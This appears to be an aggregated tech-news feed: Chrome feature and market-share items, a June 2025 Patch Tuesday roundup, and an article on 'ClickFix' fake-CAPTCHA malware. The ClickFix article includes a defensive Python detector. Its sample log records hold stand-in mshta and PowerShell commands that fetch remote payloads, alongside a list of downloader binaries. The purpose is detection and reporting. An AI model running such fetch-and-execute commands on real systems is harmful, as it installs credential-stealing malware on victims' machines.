
Chrome Will Automatically Disable Web Notifications You Don't Care About

Google is introducing a new Chrome browser feature for Android and desktop users that automatically turns off notifications for websites that you're already ignoring. From a report: Chrome's Safety Check feature already provides similar functionality for camera access and location tracking permissions. This new auto-revocation feature builds on a similar Android feature that already makes it easier for Chrome users to unsubscribe from website notifications they don't care about with a single tap. The feature doesn't revoke notifications for any web apps installed on the device, and permissions will only be disabled for sites that send a lot of notifications that users rarely engage with. Less than one percent of all web notifications in Chrome currently receive any interaction from users, according to Google, often making them more distracting than helpful.

Read more of this story at Slashdot.

Google Temporarily Pauses AI-Powered 'Homework Helper' Button in Chrome Over Cheating Concerns

An anonymous reader shared this article from the Washington Post: A student taking an online quiz sees a button appear in their Chrome browser: "homework help." Soon, Google's artificial intelligence has read the question on-screen and suggests "choice B" as the answer. The temptation to cheat was suddenly just two clicks away Sept. 2, when Google quietly added a "homework help" button to Chrome, the world's most popular web browser. The button has been appearing automatically on the kinds of course websites used by the majority of American college students and many high-schoolers, too. Pressing it launches Google Lens, a service that reads what's on the page and can provide an "AI Overview" answer to questions — including during tests. Educators I've spoken with are alarmed. Schools including Emory University, the University of Alabama, the University of California at Los Angeles and the University of California at Berkeley have alerted faculty how the button appears in the URL box of course sites and their limited ability to control it. Chrome's cheating tool exemplifies Big Tech's continuing gold rush approach to AI: launch first, consider consequences later and let society clean up the mess. "Google is undermining academic integrity by shoving AI in students' faces during exams," says Ian Linkletter, a librarian at the British Columbia Institute of Technology who first flagged the issue to me. "Google is trying to make instructors give up on regulating AI in their classroom, and it might work. Google Chrome has the market share to change student behavior, and it appears this is the goal." Several days after I contacted Google about the issue, the company told me it had temporarily paused the homework help button — but also didn't commit to keeping it off. 
"Students have told us they value tools that help them learn and understand things visually, so we're running tests offering an easier way to access Lens while browsing," Google spokesman Craig Ewer said in a statement.


Google Adds Gemini To Chrome Desktop Browser for US Users

Google has added Gemini features to Chrome for all desktop users in the US browsing in English following a limited release to paying subscribers in May. The update introduces a Gemini button in the browser that launches a chatbot capable of answering questions about page content and synthesizing information from multiple tabs. Users can remove the Gemini sparkle icon from Chrome's interface. Google will add its AI Mode search feature to Chrome's address bar before September ends. The feature will suggest prompts based on webpage content but won't replace standard search functionality. Chrome on Android already includes Gemini features. The company plans to add agentic capabilities in coming months that would allow Gemini to perform tasks like adding items to online shopping carts by controlling the browser cursor.


Chrome Increases Its Overwhelming Market Share, Now Over 70%

Chrome has extended its dominance in the browser wars, surpassing 70% market share on desktops while Edge, Safari, Firefox, and Opera trail far behind. Neowin reports: According to Statcounter, in August 2025, Chrome kept on increasing its overwhelming market share, which is now above the 70% mark (70.25%, to be precise) in the desktop browser market. The gap between Chrome and its closest competitor, Microsoft Edge, is immense, with Edge holding just 11.8% (+0.01 points over the previous month). Apple's Safari is third with 6.34% (+1.04 points); Firefox has 4.94% (-0.36 points); and Opera is fifth with a modest 2.06% market share (-0.13 points). Things look similar on the mobile side of the market, with Google Chrome having 69.15% (+1.92 points) and Safari being second with 20.32% (-2.2 points). Samsung Internet is third with 3.33% (-0.17 points). As for Microsoft Edge, its mobile share is only 0.59% (+0.06 points). The findings can be found here.


Patch Tuesday, June 2025 Edition

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

ClickFix: How to Infect Your PC in Three Easy Steps

A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.

ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.

Executing this series of keypresses prompts Windows to download password-stealing malware.

Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.

“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”
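The three keypresses above leave a recognisable trace in process-creation telemetry: a download-capable binary such as mshta.exe started from the Explorer/Run dialog with a URL on its command line, followed by a child process (PowerShell, for instance) spawned by mshta.exe. The following detector is an added example, not code from KrebsOnSecurity or Microsoft; it runs over constructed Sysmon-style records (field names follow Sysmon Event ID 1, the records and the one-line "key=value|..." layout are assumptions) and grades each one.

```python
import re

# Constructed Sysmon-style (Event ID 1) records, one "key=value|..." per line.
# Field names follow Sysmon; the records are made up for this illustration.
SAMPLE_LOG = """\
Image=C:\\Windows\\explorer.exe|ParentImage=C:\\Windows\\System32\\userinit.exe|CommandLine=C:\\Windows\\Explorer.EXE
Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=mshta https://example.invalid/verify.hta
Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad C:\\Users\\me\\notes.txt
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\mshta.exe|CommandLine=powershell -c "iwr http://example.invalid/stage2"
Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=mshta C:\\Tools\\local.hta
"""

# Binaries that can fetch and run remote content; a URL on their command line
# right after an interactive launch is the ClickFix signature.
DOWNLOADERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_record(line):
    """Split one 'k=v|k=v' record into a dict."""
    return dict(part.partition("=")[::2] for part in line.split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(rec):
    """Return (severity, reason) for one record, or None if it looks benign."""
    image = basename(rec.get("Image", ""))
    parent = basename(rec.get("ParentImage", ""))
    has_url = bool(URL_RE.search(rec.get("CommandLine", "")))
    if image == "mshta.exe" and has_url:
        return ("high", "mshta.exe given a remote URL (ClickFix step 3)")
    if parent == "mshta.exe":
        return ("high", "process spawned by mshta.exe (second-stage payload)")
    if image in DOWNLOADERS and has_url and parent == "explorer.exe":
        return ("high", "downloader with a URL launched from Explorer/Run dialog")
    if image == "mshta.exe":
        return ("low", "mshta.exe execution; review the HTA source")
    return None


def scan(log_text):
    """Run classify() over every record; returns (severity, reason, command line) hits."""
    hits = []
    for line in filter(None, log_text.splitlines()):
        rec = parse_record(line)
        verdict = classify(rec)
        if verdict:
            hits.append((*verdict, rec.get("CommandLine", "")))
    return hits
```

On the sample data the benign Explorer and Notepad launches produce no hit, while the Run-dialog mshta launch, its PowerShell child, and the local HTA are graded high, high and low respectively.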

According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.

In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.

Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.

An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.

ClickFix tactic used by malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. Source: Sekoia.

The ClickFix attack — and its reliance on mshta.exe — is reminiscent of phishing techniques employed for years that hid exploits inside Microsoft Office macros. Malicious macros became such a common malware threat that Microsoft was forced to start blocking macros by default in Office documents that try to download content from the web.

Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of a Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.

HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). Image: Proofpoint.

Organizations that wish to do so can take advantage of Microsoft Group Policy restrictions to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.

Certificate Transparency Means What, Again?

Brian King // News from Google this week says that Chrome will start enforcing Certificate Transparency a year from now. https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/78N3SMcqUGw This means that when Chrome contacts a website, if […]

The post Certificate Transparency Means What, Again? appeared first on Black Hills Information Security, Inc.
